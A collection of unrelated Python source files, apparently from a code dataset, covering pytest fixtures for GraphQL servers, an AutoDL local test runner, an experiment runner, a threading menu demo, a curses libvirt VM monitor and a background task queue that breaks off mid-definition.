from context import HGECtx, HGECtxError, EvtsWebhookServer, HGECtxGQLServer, GQLWsClient
import threading
import random
from datetime import datetime
import sys
import os
def pytest_addoption(parser):
parser.addoption(
"--hge-urls",
metavar="HGE_URLS",
help="csv list of urls for graphql-engine",
required=False,
nargs='+'
)
parser.addoption(
"--pg-urls", metavar="PG_URLS",
help="csv list of urls for connecting to Postgres directly",
required=False,
nargs='+'
)
parser.addoption(
"--hge-key", metavar="HGE_KEY", help="admin secret key for graphql-engine", required=False
)
parser.addoption(
"--hge-webhook", metavar="HGE_WEBHOOK", help="url for graphql-engine's access control webhook", required=False
)
parser.addoption(
"--test-webhook-insecure", action="store_true",
help="Run Test cases for insecure https webhook"
)
parser.addoption(
"--hge-jwt-key-file", metavar="HGE_JWT_KEY_FILE", help="File containting the private key used to encode jwt tokens using RS512 algorithm", required=False
)
parser.addoption(
"--hge-jwt-conf", metavar="HGE_JWT_CONF", help="The JWT conf", required=False
)
parser.addoption(
"--test-cors", action="store_true",
required=False,
help="Run testcases for CORS configuration"
)
parser.addoption(
"--test-ws-init-cookie",
metavar="read|noread",
required=False,
help="Run testcases for testing cookie sending over websockets"
)
parser.addoption(
"--test-metadata-disabled", action="store_true",
help="Run Test cases with metadata queries being disabled"
)
parser.addoption(
"--test-graphql-disabled", action="store_true",
help="Run Test cases with GraphQL queries being disabled"
)
parser.addoption(
"--test-hge-scale-url",
metavar="<url>",
required=False,
help="Run testcases for horizontal scaling"
)
parser.addoption(
"--test-allowlist-queries", action="store_true",
help="Run Test cases with allowlist queries enabled"
)
parser.addoption(
"--test-logging",
action="store_true",
default=False,
required=False,
help="Run testcases for logging"
)
parser.addoption(
"--accept",
action="store_true",
default=False,
required=False,
help="Accept any failing test cases from YAML files as correct, and write the new files out to disk."
)
#By default,
#1) Set default parallelism to one
#2) Set test grouping to by filename (--dist=loadfile)
def pytest_cmdline_preparse(config, args):
worker = os.environ.get('PYTEST_XDIST_WORKER')
if 'xdist' in sys.modules and not worker: # pytest-xdist plugin
num = 1
args[:] = ["-n" + str(num),"--dist=loadfile"] + args
def pytest_configure(config):
if is_master(config):
if not config.getoption('--hge-urls'):
print("hge-urls should be specified")
if not config.getoption('--pg-urls'):
print("pg-urls should be specified")
config.hge_url_list = config.getoption('--hge-urls')
config.pg_url_list = config.getoption('--pg-urls')
config.hge_ctx_gql_server = HGECtxGQLServer(config.hge_url_list)
if config.getoption('-n', default=None):
xdist_threads = config.getoption('-n')
assert xdist_threads <= len(config.hge_url_list), "Not enough hge_urls specified, Required " + str(xdist_threads) + ", got " + str(len(config.hge_url_list))
assert xdist_threads <= len(config.pg_url_list), "Not enough pg_urls specified, Required " + str(xdist_threads) + ", got " + str(len(config.pg_url_list))
random.seed(datetime.now())
@pytest.hookimpl(optionalhook=True)
def pytest_configure_node(node):
node.slaveinput["hge-url"] = node.config.hge_url_list.pop()
node.slaveinput["pg-url"] = node.config.pg_url_list.pop()
def pytest_unconfigure(config):
config.hge_ctx_gql_server.teardown()
@pytest.fixture(scope='module')
def hge_ctx(request):
config = request.config
print("create hge_ctx")
if is_master(config):
hge_url = config.hge_url_list[0]
else:
hge_url = config.slaveinput["hge-url"]
if is_master(config):
pg_url = config.pg_url_list[0]
else:
pg_url = config.slaveinput["pg-url"]
hge_key = config.getoption('--hge-key')
hge_webhook = config.getoption('--hge-webhook')
webhook_insecure = config.getoption('--test-webhook-insecure')
hge_jwt_key_file = config.getoption('--hge-jwt-key-file')
hge_jwt_conf = config.getoption('--hge-jwt-conf')
ws_read_cookie = config.getoption('--test-ws-init-cookie')
metadata_disabled = config.getoption('--test-metadata-disabled')
hge_scale_url = config.getoption('--test-hge-scale-url')
try:
hge_ctx = HGECtx(
hge_url=hge_url,
pg_url=pg_url,
hge_key=hge_key,
hge_webhook=hge_webhook,
webhook_insecure=webhook_insecure,
hge_jwt_key_file=hge_jwt_key_file,
hge_jwt_conf=hge_jwt_conf,
ws_read_cookie=ws_read_cookie,
metadata_disabled=metadata_disabled,
hge_scale_url=hge_scale_url,
)
except HGECtxError as e:
assert False, "Error from hge_cxt: " + str(e)
# TODO this breaks things (https://github.com/pytest-dev/pytest-xdist/issues/86)
# so at least make sure the real error gets printed (above)
pytest.exit(str(e))
yield hge_ctx # provide the fixture value
print("teardown hge_ctx")
hge_ctx.teardown()
time.sleep(1)
@pytest.fixture(scope='class')
def evts_webhook(request):
webhook_httpd = EvtsWebhookServer(server_address=('127.0.0.1', 5592))
web_server = threading.Thread(target=webhook_httpd.serve_forever)
web_server.start()
yield webhook_httpd
webhook_httpd.shutdown()
webhook_httpd.server_close()
web_server.join()
@pytest.fixture(scope='class')
def ws_client(request, hge_ctx):
client = GQLWsClient(hge_ctx, '/v1/graphql')
time.sleep(0.1)
yield client
client.teardown()
@pytest.fixture(scope='class')
def setup_ctrl(request, hge_ctx):
"""
This fixure is used to store the state of test setup in some test classes.
Used primarily when teardown is skipped in some test cases in the class where the test is not expected to change the database state.
"""
setup_ctrl = { "setupDone" : False }
yield setup_ctrl
hge_ctx.may_skip_test_teardown = False
request.cls().do_teardown(setup_ctrl, hge_ctx)
def is_master(config):
"""True if the code running the given pytest.config object is running in a xdist master
node or not running xdist at all.
"""
return not hasattr(config, 'slaveinput')
|
run_local_test.py
|
# Author: Zhengying LIU
# Creation date: 20 Sep 2018
"""This script allows participants to run local test of their method within the
downloaded starting kit folder (and avoid using submission quota on CodaLab). To
do this, run:
```
python run_local_test.py -dataset_dir='./AutoDL_sample_data/' -code_dir='./AutoDL_sample_code_submission/'
```
in the starting kit directory. If you want to test the performance of a
different algorithm on a different dataset, please specify them using respective
arguments (flags).
If you want to use default folders (i.e. those in above command line), simply
run
```
python run_local_test.py
```
"""
import tensorflow as tf
import os
import time
import webbrowser
from multiprocessing import Process
def _HERE(*args):
h = os.path.dirname(os.path.realpath(__file__))
return os.path.join(h, *args)
def get_path_to_ingestion_program(starting_kit_dir):
return os.path.join(starting_kit_dir,
'AutoDL_ingestion_program', 'ingestion.py')
def get_path_to_scoring_program(starting_kit_dir):
return os.path.join(starting_kit_dir,
'AutoDL_scoring_program', 'score.py')
def run_baseline(dataset_dir, code_dir):
# Current directory containing this script
starting_kit_dir = os.path.dirname(os.path.realpath(__file__))
path_ingestion = get_path_to_ingestion_program(starting_kit_dir)
path_scoring = get_path_to_scoring_program(starting_kit_dir)
# Run ingestion and scoring at the same time
command_ingestion = 'python {} {} {}'.format(path_ingestion, dataset_dir, code_dir)
command_scoring = 'python {} {}'.format(path_scoring, dataset_dir)
def run_ingestion():
os.system(command_ingestion)
def run_scoring():
os.system(command_scoring)
ingestion_process = Process(name='ingestion', target=run_ingestion)
scoring_process = Process(name='scoring', target=run_scoring)
ingestion_process.start()
scoring_process.start()
detailed_results_page = os.path.join(starting_kit_dir,
'AutoDL_scoring_output',
'detailed_results.html')
detailed_results_page = os.path.abspath(detailed_results_page)
# Open detailed results page in a browser
time.sleep(2)
for i in range(30):
if os.path.isfile(detailed_results_page):
webbrowser.open('file://'+detailed_results_page, new=2)
break
time.sleep(1)
if __name__ == '__main__':
default_starting_kit_dir = os.path.abspath(os.path.join(_HERE()))
default_dataset_dir = os.path.join(default_starting_kit_dir,
'AutoDL_sample_data')
default_code_dir = os.path.join(default_starting_kit_dir,
'AutoDL_sample_code_submission')
tf.flags.DEFINE_string('dataset_dir', default_dataset_dir,
"Directory containing the content (e.g. adult.data/ + "
"adult.solution) of an AutoDL dataset. Specify this "
"argument if you want to test on a different dataset.")
tf.flags.DEFINE_string('code_dir', default_code_dir,
"Directory containing a `model.py` file. Specify this "
"argument if you want to test on a different algorithm.")
FLAGS = tf.flags.FLAGS
dataset_dir = FLAGS.dataset_dir
code_dir = FLAGS.code_dir
run_baseline(dataset_dir, code_dir)
|
conftest.py
|
# Copyright 2019 Axis Communications AB.
#
# For a full list of individual contributors, please see the commit history.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -*- coding: utf-8 -*-
import os
import threading
import pytest
from eiffel_graphql_api.graphql.api import APP
from eiffel_graphql_api.graphql.db.database import get_client
def start():
"""Start a GraphQL API for testing."""
APP.run("127.0.0.1", 12345)
@pytest.fixture(scope="session", autouse=True)
def start_server(request):
"""Start the Graphql API server in a thread. This is done once per test session."""
client = get_client(mock=True)
thread = threading.Thread(target=start)
thread.daemon = True
thread.start()
client.drop_database(os.getenv("DATABASE_NAME"))
def start_server_fin():
"""Drop the MongoDB database as a cleanup measure."""
client.drop_database(os.getenv("DATABASE_NAME"))
|
run_experiments_estimation.py
|
import json
import os
from collections import defaultdict
from multiprocessing import Queue, Process
import numpy as np
from experiment_setups.estimation_experiment_setups import simple_iv_setup, \
heteroskedastic_iv_setup, policy_learning_setup
from utils.hyperparameter_optimization import iterate_placeholder_values, \
fill_placeholders, fill_global_values
setup_list = [simple_iv_setup, heteroskedastic_iv_setup, policy_learning_setup]
save_dir = "results_estimation"
def main():
for setup in setup_list:
run_experiment(setup)
def run_experiment(setup):
results = []
n_range = sorted(setup["n_range"], reverse=True)
num_procs = setup["num_procs"]
num_reps = setup["num_reps"]
num_jobs = len(n_range) * num_reps
if num_procs == 1:
# run jobs sequentially
for n in n_range:
for rep_i in range(setup["num_reps"]):
results.extend(do_job(setup, n, rep_i, verbose=True))
else:
# run jobs in separate processes using queue'd system
jobs_queue = Queue()
results_queue = Queue()
for n in n_range:
for rep_i in range(setup["num_reps"]):
jobs_queue.put((setup, n, rep_i))
procs = []
for i in range(num_procs):
p = Process(target=run_jobs_loop, args=(jobs_queue, results_queue))
procs.append(p)
jobs_queue.put("STOP")
p.start()
num_done = 0
while num_done < num_jobs:
results.extend(results_queue.get())
num_done += 1
for p in procs:
p.join()
# build aggregate results
aggregate_results = build_aggregate_results(results)
if not os.path.exists(save_dir):
os.makedirs(save_dir)
save_path = os.path.join(save_dir, "%s_results.json" % setup["setup_name"])
with open(save_path, "w") as f:
output = {"results": results, "setup": setup,
"aggregate_results": aggregate_results}
json.dump(output, f, default=lambda c_: c_.__name__,
indent=2, sort_keys=True)
def run_jobs_loop(jobs_queue, results_queue):
for job_args in iter(jobs_queue.get, "STOP"):
results = do_job(*job_args)
results_queue.put(results)
def do_job(setup, n, rep_i, verbose=False):
results = []
print("setting up scenario for %s setup (n=%d, rep=%d)"
% (setup["setup_name"], n, rep_i))
scenario_class = setup["scenario"]["class"]
scenario_args = setup["scenario"]["args"]
scenario = scenario_class(**scenario_args)
scenario.setup(num_train=n, num_dev=n,
num_test=setup["num_test"])
train = scenario.get_dataset("train")
dev = scenario.get_dataset("dev")
test = scenario.get_dataset("test")
k_z_class = setup["dev_z_kernel_class"]
k_z_args = setup["dev_z_kernel_args"]
rho_dim = scenario.get_rho_dim()
setup["rho_dim"] = scenario.get_rho_dim()
setup["z_dim"] = scenario.get_z_dim()
if isinstance(k_z_class, list):
k_z_list = [c_(**a_) for c_, a_ in zip(k_z_class, k_z_args)]
else:
k_z_list = [k_z_class(**k_z_args) for _ in range(rho_dim)]
for k_z in k_z_list:
k_z.train(train.z)
for method in setup["methods"]:
if verbose:
print("running iv_methods %s under %s setup (n=%d, rep=%d)"
% (method["name"], setup["setup_name"], n, rep_i))
placeholder_options = method["placeholder_options"]
for placeholder_values in iterate_placeholder_values(
placeholder_options):
if placeholder_values:
print("using placeholder values", placeholder_values)
rho_generator = scenario.get_rho_generator()
args = fill_global_values(method["args"], setup)
args = fill_placeholders(args, placeholder_values)
predictor = method["class"](rho_generator=rho_generator,
rho_dim=rho_dim, **args)
predictor.fit(x=train.x, z=train.z, x_dev=dev.x, z_dev=dev.z)
predicted_params = predictor.get_fitted_parameter_vector()
true_params = scenario.get_true_parameter_vector()
sq_error = float(((predicted_params - true_params) ** 2).sum())
param_dict = predictor.get_fitted_parameter_dict()
dev_mmr_loss = predictor.calc_mmr_loss(k_z_list, dev.x, dev.z)
risk = scenario.calc_test_risk(test.x, test.z, predictor)
row = {
"n": n,
"dev_mmr_loss": dev_mmr_loss,
"method": method["name"],
"rep": rep_i,
"sq_error": sq_error,
"predicted_params": param_dict,
"placeholder_values": placeholder_values,
"risk": risk,
}
results.append(row)
if verbose:
print(json.dumps(row, sort_keys=True, indent=2))
if verbose:
print("")
return results
def build_aggregate_results(results):
se_list_collection = defaultdict(lambda: defaultdict(list))
risk_list_collection = defaultdict(lambda: defaultdict(list))
for row in results:
method = row["method"]
n = row["n"]
key = "%05d::%s" % (n, method)
hyperparam_values = tuple(sorted(row["placeholder_values"].items()))
se_list_collection[key][hyperparam_values].append(row["sq_error"])
risk_list_collection[key][hyperparam_values].append(row["risk"])
aggregate_results = {}
for key in sorted(se_list_collection.keys()):
n = int(key.split("::")[0])
method = key.split("::")[1]
print("aggregate results for n=%d, method: %s" % (n, method))
aggregate_results[key] = []
for hyperparam_values in sorted(se_list_collection[key].keys()):
sq_error_list = se_list_collection[key][hyperparam_values]
se_mean = float(np.mean(sq_error_list))
se_std = float(np.std(sq_error_list))
se_max = float(np.max(sq_error_list))
risk_list = risk_list_collection[key][hyperparam_values]
risk_mean = float(np.mean(risk_list))
risk_std = float(np.std(risk_list))
risk_max = float(np.max(risk_list))
print("%r: mse = %f ± %f (max %f) --- risk = %f ± %f (max %f)"
% (hyperparam_values, se_mean, se_std, se_max,
risk_mean, risk_std, risk_max))
result = {
"hyperparam_values": dict(hyperparam_values),
"mean_square_error": se_mean,
"std_square_error": se_std,
"max_square_error": se_max,
"mean_risk": risk_mean,
"std_risk": risk_std,
"max_risk": risk_max,
}
aggregate_results[key].append(result)
return aggregate_results
if __name__ == "__main__":
main()
|
runner.py
|
#!/usr/bin/env python
""" This is an example for what a project looks like
with multiple modules and threads while trying to use best practices.
"""
# Imports
import time
import threading
# local
from anaconda.hello import hello
from anaconda.world import world
# Storage
hello_running = False
world_running = False
def toggle_hello():
"""Run / stop hello, could ask for some parameters before running the function and pass that to the
hello.start_loop with threading.Thread(target=hello.start_loop, args=(paramet,))"""
global hello_running
hello_running ^= True # Toggle global parameter so this acts like a switch
if hello_running:
hello.set_should_loop(True)
# Should start multithreading here so this runner thread is not blocked.
# threading = more lightweight than multiprocessing
# coroutines are even better but didn't look into that yet
hello_thread = threading.Thread(target=hello.start_loop)
hello_thread.start()
else:
hello.set_should_loop(False)
def toggle_world():
"""Run / stop hello, could ask for some parameters before running the function and pass that to the
hello.start_loop with threading.Thread(target=hello.start_loop, args=(paramet,))"""
global world_running
world_running ^= True # Toggle global parameter so this acts like a switch
if world_running:
world.set_should_loop(True)
# Should start multithreading here so this runner thread is not blocked.
# threading = more lightweight than multiprocessing
# coroutines are even better but i dont know about them (just yet)
world_thread = threading.Thread(target=world.start_loop)
world_thread.start()
return
else:
world.set_should_loop(False)
return
def start():
"""Start our script/program"""
# needed variables
global hello_running
global world_running
# Print our menu
# Keeps looping so the menu will always be there after a choice is done.
while(True):
# Option 1
if hello_running:
print('[1] | Stop hello')
else:
print('[1] | Run hello')
# Option 2
if world_running:
print('[2] | Stop world')
else:
print('[2] | Run world')
# Exit
print('[3] | Exit program')
option = ''
try:
option = int(input('Enter your choice: '))
except:
print('Wrong input. Please enter a number ...')
#Check what choice was entered and act accordingly
if option == 1:
toggle_hello()
elif option == 2:
toggle_world()
elif option == 3:
print('Quiting program..')
exit()
else:
print('Invalid option. Please enter a number between 1 and 3.')
if __name__ == '__main__':
start()
|
vmtop.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import division
import curses
import libvirt
import threading
import time
from ovm.lvconnect import LibvirtConnect
from ovm.utils.printer import si_unit
UPDATE_DATA_INTERVAL = 1
REFRESH_INTERVAL = 0.5
SORT_NAME, SORT_CPU, SORT_MEM = 0, 1, 3
class DomainStats:
def __init__(self, domain, host_stats):
self.domain = domain
self.name = domain.name()
self.host_stats = host_stats
# CPU
self.cpu_usage = 0
self.cpu_time = 0
# Memory
self.host_mem = self.guest_mem = 0
# Network
self.net_rx_bytes = self.net_tx_bytes = 0
self.net_rx_rate = self.net_tx_rate = 0
# Storage
self.block_rd_bytes = self.block_wr_bytes = 0
self.block_rd_rate = self.block_wr_rate = 0
@staticmethod
def compute_cpu_usage(prev, cur, cpu_count):
return min(
(cur - prev) / (UPDATE_DATA_INTERVAL * cpu_count * 10**7),
100
)
def update_cpu(self, stats):
previous_cpu_time = self.cpu_time
domain_cpu_count = stats.get('vcpu.current', 1)
sum_time = 0
for i in range(domain_cpu_count):
sum_time += stats.get('vcpu.0.time', 0)
current_cpu_time = sum_time / domain_cpu_count
if previous_cpu_time > 0:
self.cpu_usage = self.compute_cpu_usage(
previous_cpu_time, current_cpu_time, self.host_stats.cpu_count
)
self.cpu_time = current_cpu_time
def update_memory(self, stats):
# Current memory allocated on the host
self.host_mem = self.domain.memoryStats().get('rss', 0) * 1024
# guest current max memory
self.guest_mem = stats.get('balloon.maximum', 0) * 1024
def update_network(self, stats):
current_rx_bytes = stats.get('net.0.rx.bytes', 0)
current_tx_bytes = stats.get('net.0.tx.bytes', 0)
previous_rx_bytes = self.net_rx_bytes
previous_tx_bytes = self.net_tx_bytes
if previous_rx_bytes > 0:
self.net_rx_rate = (
(current_rx_bytes - previous_rx_bytes) * 8
/ UPDATE_DATA_INTERVAL
)
if previous_tx_bytes > 0:
self.net_tx_rate = (
(current_tx_bytes - previous_tx_bytes) * 8
/ UPDATE_DATA_INTERVAL
)
self.net_rx_bytes = current_rx_bytes
self.net_tx_bytes = current_tx_bytes
def update_storage(self, stats):
current_rd_bytes = stats.get('block.0.rd.bytes', 0)
current_wd_bytes = stats.get('block.0.wr.bytes', 0)
previous_rd_bytes = self.block_rd_bytes
previous_wd_bytes = self.block_wr_bytes
if previous_rd_bytes > 0:
self.block_rd_rate = (
(current_rd_bytes - previous_rd_bytes) * 8
/ UPDATE_DATA_INTERVAL
)
if previous_wd_bytes > 0:
self.block_wr_rate = (
(current_wd_bytes - previous_wd_bytes) * 8
/ UPDATE_DATA_INTERVAL
)
self.block_rd_bytes = current_rd_bytes
self.block_wr_bytes = current_wd_bytes
def update(self, stats):
for name in ('cpu', 'memory', 'network', 'storage'):
getattr(self, 'update_%s' % name)(stats)
def format(self, pattern):
stats = {
'name': self.name,
'cpu_usage': round(self.cpu_usage),
'guest_mem': si_unit(self.guest_mem, True) + 'B',
'host_mem': si_unit(self.host_mem, True) + 'B',
'net_rx': '{0}bps'.format(si_unit(self.net_rx_rate)),
'net_tx': '{0}bps'.format(si_unit(self.net_tx_rate)),
'block_rd': '{0}bps'.format(si_unit(self.block_rd_rate)),
'block_wr': '{0}bps'.format(si_unit(self.block_wr_rate))
}
return pattern.format(**stats)
class HostStats:
def __init__(self, connection):
self._connection = connection
self.hostname = connection.getHostname()
host_info = connection.getInfo()
self.cpu_count = host_info[2]
self.cpu_freq = host_info[3] * (10**6)
self.cpu_time = 0
self.cpu_usage = 0
self.mem_vms_total = 0
self.mem_os = 0
self.mem_total = 0
self.mem_cached = 0
self.domain_count = 0
def update(self, total_mem_domain, domain_count):
self.domain_count = domain_count
host_info = self._connection.getInfo()
self.cpu_freq = host_info[3] * (10**6)
cpu_stats = self._connection.getCPUStats(
libvirt.VIR_NODE_CPU_STATS_ALL_CPUS)
cpu_time = sum((cpu_stats[k] for k in ('kernel', 'user', 'iowait'))) \
/ self.cpu_count
if self.cpu_time > 0:
self.cpu_usage = min(1, ((cpu_time - self.cpu_time)
/ (UPDATE_DATA_INTERVAL * 10**9)))
self.cpu_time = cpu_time
mem_stats = self._connection.getMemoryStats(
libvirt.VIR_NODE_MEMORY_STATS_ALL_CELLS
)
self.mem_total = mem_stats['total'] * 1024
self.mem_vms_total = total_mem_domain
self.mem_os = ((mem_stats['total'] - mem_stats['free']
- mem_stats['cached']
- mem_stats['buffers']) * 1024
- total_mem_domain)
self.mem_cached = (mem_stats['cached'] - mem_stats['buffers']) * 1024
class VMTop:
def __init__(self):
self._domains = {}
self.libvirt_conn = LibvirtConnect.get_connection()
self._sort_on = SORT_NAME
self.host_stats = HostStats(self.libvirt_conn)
self.screen = curses.initscr()
self.init_terminal()
# Init colors
colors = (
('TABLE_HEADER', curses.COLOR_BLACK, curses.COLOR_GREEN),
('TABLE_HEADER_SELECTED', curses.COLOR_BLACK, curses.COLOR_CYAN),
('RED_ON_BLACK', curses.COLOR_RED, curses.COLOR_BLACK),
('GREEN_ON_BLACK', curses.COLOR_GREEN, curses.COLOR_BLACK),
('CYAN_ON_BLACK', curses.COLOR_CYAN, curses.COLOR_BLACK),
('BLACK_ON_CYAN', curses.COLOR_BLACK, curses.COLOR_CYAN),
('YELLOW_ON_BLACK', curses.COLOR_YELLOW, curses.COLOR_BLACK)
)
for i, color in enumerate(colors, 1):
name, fg, bg = color
curses.init_pair(i, fg, bg)
setattr(self, name, curses.color_pair(i))
try:
self.main()
finally:
self.reset_terminal()
def main(self):
refresh_thread = threading.Thread(target=self.refresh)
refresh_thread.daemon = True
refresh_thread.start()
update_data_thread = threading.Thread(target=self.update_data)
update_data_thread.daemon = True
update_data_thread.start()
while True:
event = self.screen.getch()
if event == ord('c'):
self._sort_on = SORT_CPU
elif event == ord('n'):
self._sort_on = SORT_NAME
elif event == ord('m'):
self._sort_on = SORT_MEM
elif event == ord('q'):
break
def init_terminal(self):
curses.start_color()
curses.noecho()
curses.cbreak()
curses.curs_set(0)
self.screen.keypad(1)
self.screen.clear()
self.screen.refresh()
def reset_terminal(self):
curses.nocbreak()
self.screen.keypad(0)
curses.echo()
curses.endwin()
def update_data(self):
while True:
self._update_data()
time.sleep(UPDATE_DATA_INTERVAL)
def _update_data(self):
total_mem_domain = 0
domains = self.libvirt_conn.getAllDomainStats(
flags=libvirt.VIR_CONNECT_GET_ALL_DOMAINS_STATS_RUNNING
)
current_domains = set()
for domain, libvirt_stats in domains:
name = domain.name()
current_domains.add(name)
if name not in self._domains:
self._domains[name] = DomainStats(domain, self.host_stats)
self._domains[name].update(libvirt_stats)
total_mem_domain += self._domains[name].host_mem
# Delete all domains not active in domain stats list
deleted_domains = set(self._domains.keys()) - current_domains
list(map(self._domains.pop, deleted_domains))
domain_count = len(current_domains)
self.host_stats.update(total_mem_domain, domain_count)
def draw_host_bar(self, line):
style = self.CYAN_ON_BLACK
bar_format = ' :: '.join((
'{hostname}',
'CPU: {cpu_count} ({cpu_freq} MHz)',
'Memory: {mem_total}iB',
'Domains: {domain_count}'
))
text = bar_format.format(
hostname=self.host_stats.hostname,
cpu_count=self.host_stats.cpu_count,
cpu_freq=int(self.host_stats.cpu_freq / 10**6),
mem_total=si_unit(self.host_stats.mem_total),
domain_count=self.host_stats.domain_count
)
self.screen.addstr(line, 0, text, style)
self.screen.clrtoeol()
def draw_cpu_bar(self, line):
# Some params
bar_graph_width = 40
# Inialize the line
self.screen.move(line, 0)
self.screen.clrtoeol()
# Show 'CPU'
self.screen.move(line, 1)
self.screen.addstr('CPU', self.CYAN_ON_BLACK)
# Print the left side of the bar graph
self.screen.addstr(' [')
# Print the memory take by OS
pipe_count = int(round(self.host_stats.cpu_usage * bar_graph_width))
self.screen.addstr('|' * pipe_count, self.RED_ON_BLACK)
# Print the right side of the bar graph
_, x = self.screen.getyx()
self.screen.move(line, x + bar_graph_width - pipe_count)
self.screen.addstr('] ')
self.screen.addstr('{0} %'.format(
round(self.host_stats.cpu_usage * 100)))
def draw_memory_bar(self, line):
current_bar_size = 0
# Some params
bar_graph_width = 40
# Inialize the line
self.screen.move(line, 0)
self.screen.clrtoeol()
# Show 'Mem'
self.screen.move(line, 1)
self.screen.addstr('Mem', self.CYAN_ON_BLACK)
# Print the left side of the bar graph
self.screen.addstr(' [')
# Print the memory take by OS
if self.host_stats.mem_total > 0:
ratio = self.host_stats.mem_os / self.host_stats.mem_total
mem_os_size = int(round(ratio * bar_graph_width))
self.screen.addstr('|' * mem_os_size, self.RED_ON_BLACK)
current_bar_size += mem_os_size
# Print the memory take by VMs
if self.host_stats.mem_total > 0:
ratio = self.host_stats.mem_vms_total / self.host_stats.mem_total
mem_vms_size = int(round(ratio * bar_graph_width))
self.screen.addstr('|' * mem_vms_size, self.GREEN_ON_BLACK)
current_bar_size += mem_vms_size
# Print the memory cached
if self.host_stats.mem_total > 0:
ratio = self.host_stats.mem_cached / self.host_stats.mem_total
mem_cached_size = int(round(ratio * bar_graph_width))
self.screen.addstr('|' * mem_cached_size, self.YELLOW_ON_BLACK)
current_bar_size += mem_cached_size
# Print the right side of the bar graph
_, x = self.screen.getyx()
self.screen.move(line, x + bar_graph_width - current_bar_size)
self.screen.addstr('] ')
# Print the text aside
self.screen.addstr(
'{0}B'.format(si_unit(self.host_stats.mem_os, True)),
self.RED_ON_BLACK
)
self.screen.addstr(' / ')
self.screen.addstr(
'{0}B'.format(si_unit(self.host_stats.mem_vms_total, True)),
self.GREEN_ON_BLACK
)
self.screen.addstr(
' / {0}B'.format(si_unit(self.host_stats.mem_total, True))
)
def draw_domains(self, line):
# Initialize columns
TABLES_COLS = (
'{name:15}', '{cpu_usage:>8}', '{guest_mem:>10}', '{host_mem:>10}',
'{net_rx:>10}', '{net_tx:>10}', '{block_rd:>10}', '{block_wr:>10}'
)
# Prepare table header
COLS_NAME = dict(
name='NAME', cpu_usage='%CPU', guest_mem='MEM',
host_mem='HOST MEM', net_rx='NET RX', net_tx='NET TX',
block_rd='BLK RD', block_wr='BLK WR')
# Draw the header
self.screen.move(line, 0)
for i, pattern in enumerate(TABLES_COLS):
if self._sort_on == i:
color = self.TABLE_HEADER_SELECTED
else:
color = self.TABLE_HEADER
text = pattern.format(**COLS_NAME)
self.screen.addstr(text, color)
self.screen.addstr(
' '*(self.screen.getmaxyx()[1] - self.screen.getyx()[1]),
self.TABLE_HEADER)
domains = list(self._domains.values())
domains.sort(key=lambda dom: dom.name)
if self._sort_on == SORT_CPU:
domains.sort(key=lambda dom: dom.cpu_usage, reverse=True)
elif self._sort_on == SORT_MEM:
domains.sort(key=lambda dom: dom.host_mem, reverse=True)
for domain in domains:
self.screen.addstr(domain.format(''.join(TABLES_COLS)))
self.screen.clrtoeol()
self.screen.addch('\n')
self.screen.clrtobot()
def refresh_interface(self):
self.draw_host_bar(0)
self.draw_cpu_bar(2)
self.draw_memory_bar(3)
self.draw_domains(5)
self.screen.refresh()
def refresh(self):
while True:
try:
self.refresh_interface()
except curses.error:
pass
finally:
time.sleep(REFRESH_INTERVAL)
if __name__ == '__main__':
VMTop()
|
task_queue.py
|
from collections import defaultdict
from enum import Enum
from logging import getLogger
from queue import PriorityQueue
from time import sleep, time
from threading import Thread, Lock
from typing import Callable
logger = getLogger('task_queue')
class Signal(Enum):
"""A special signal to send to a worker queue."""
STOP = 'stop'
class RunState(Enum):
"""Enum to specify the running state of the task queue."""
STOPPED = 'stopped'
RUNNING = 'running'
class TaskQueue:
"""Class to asynchronously handle tasks in the background."""
def __init__(self, num_workers: int = 1):
"""Initialize the task queue.
Args;
num_workers: How many worker threads to launch to process tasks.
"""
self.num_workers = num_workers
self.queue = PriorityQueue()
# Map from task id to latest version number for that task
self.tasks = defaultdict(int)
self.task_locks = defaultdict(Lock)
self.run_state = RunState.STOPPED
self.threads = []
def run_worker(self, i, num_retries=5):
"""Function each worker will run.
Args:
i: The thread index.
num_retries; How many times to retry the task.
"""
logger.info('Initialized task worker %s', i)
while True:
# Get the next task.
task = self.queue.get()
# Check any special signals.
if task[1] == Signal.STOP:
break
# Otherwise it is a real task to run.
time_to_run, task_args = task
task_id, task_version, fn, args, kwargs = task_args
logger.info('Worker received task %s', task_id)
logger.info('Task queue size %s', self.queue.qsize())
# If there is a newer version of the task, skip this one
with self.task_locks[task_id]:
if self.tasks[task_id] > task_version:
logger.info('Task cancelled')
self.queue.task_done()
continue
# Sleep until we are ready to run the code
time_to_sleep = max(1, time_to_run - time())
logger.info('Time to sleep %s', time_to_sleep)
if time_to_sleep > 0:
sleep(time_to_sleep)
# Make this check again
with self.task_locks[task_id]:
if self.tasks[task_id] > task_version:
logger.info('Task cancelled')
self.queue.task_done()
continue
# Run the function, retry on failures
finished = False
for backoff in [2**i for i in range(num_retries + 1)]:
try:
fn(*args, **kwargs)
finished = True
break
except Exception as e:
logger.info('An error occurred: %s', str(e))
logger.info('Sleeping %s', backoff)
sleep(backoff)
# Put the task back in the queue if we still failed
if not finished:
logger.info('Task failed, reinserting into queue %s', task_id)
self.queue.put(task)
self.queue.task_done()
logger.info('Worker %s exiting', i)
def start(self):
"""Start the background worker threads."""
if self.run_state == RunState.RUNNING:
raise ValueError('Task queue already started.')
for i in range(self.num_workers):
thread = Thread(target=self.run_worker, args=(i,))
thread.start()
self.threads.append(thread)
self.run_state = RunState.RUNNING
def stop(self, finish_ongoing_tasks: bool = True):
"""Send signals to stop all worker threads.
Args:
finish_ongoing_tasks: If true, finishes all current tasks and then stops
the worker threads, otherwise stops the threads immediately.
"""
if self.run_state == RunState.STOPPED:
raise ValueError('Task queue already stopped.')
# Gather the queue mutex to clear it and send stop signals.
if not finish_ongoing_tasks:
with self.queue.mutex:
self.queue.clear()
for i in range(self.num_workers):
self.queue.put((float('inf'), Signal.STOP))
logger.info('Waiting for workers to stop.')
for thread in self.threads:
thread.join()
logger.info('Task queue stopped.')
self.run_state = RunState.STOPPED
def submit_task(self, task_id: str, delay: float, fn: Callable, *args,
**kwargs):
"""Add a task to run.
Args:
task_id: An id to specify the task.
delay: How much time to wait before running the task.
fn: The function to run.
args: The args to pass to fn.
